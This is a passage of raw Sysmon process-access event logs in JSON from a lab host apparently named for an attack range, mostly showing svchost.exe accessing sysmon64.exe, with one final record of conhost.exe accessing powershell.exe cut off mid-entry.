C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4531,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4532,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4533,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4534,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4535,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4536,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4537,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.592","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4538,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.592\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-001074B50600}\r\nSourceProcessId: 1256\r\nSourceThreadId: 2756\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-001064C40600}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 